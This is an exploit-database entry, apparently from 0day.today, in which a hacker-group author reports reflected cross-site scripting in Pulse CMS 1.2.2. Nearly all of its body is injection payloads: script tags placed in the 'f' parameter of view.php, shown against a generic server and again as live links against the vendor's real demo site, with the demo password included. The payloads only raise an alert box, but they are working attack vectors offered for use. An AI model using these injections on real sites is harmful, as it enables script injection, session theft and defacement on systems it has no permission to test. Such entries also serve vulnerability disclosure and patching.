Pulse cms XSS Vulnerabilities

2010-02-19T00:00:00
ID 1337DAY-ID-10987
Type zdt
Reporter Th3 RDX
Modified 2010-02-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================
Pulse cms XSS Vulnerabilities
=============================

# Exploit Title: Pulse cms XSS Vulnerabilities
# Date: 19-02-2010
# Author: Th3 RDX
# Software Link: No Download Link
# Version: 1.2.2
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   Team I.C.W | Team W.O.I | Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to all Indian Cyber Warriors , Wellwishers of India & Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com

    %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Pulse CMS XSS Vulnerabilities

----- [ Vendor ] -----

http://www.pulsecms.com/
                                                                           %\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put <script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=<script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=blocks<script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=blocks/About.html<script>alert("Th3
RDX")</script>

                                                                           %\\
##############################################################################

##############################################################################
%//

                  >>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

Password for Login is ( demo )

[Link] http://www.pulsecms.com/demo/view.php?f=<script>alert("Th3 RDX")</script>

[Link] http://www.pulsecms.com/demo/view.php?f=blocks<script>alert("Th3
RDX")</script>

[Link] http://www.pulsecms.com/demo/view.php?f=blocks/About.html<script>alert("Th3
RDX")</script>

                                                                           %\\
##############################################################################



#  0day.today [2016-04-20]  #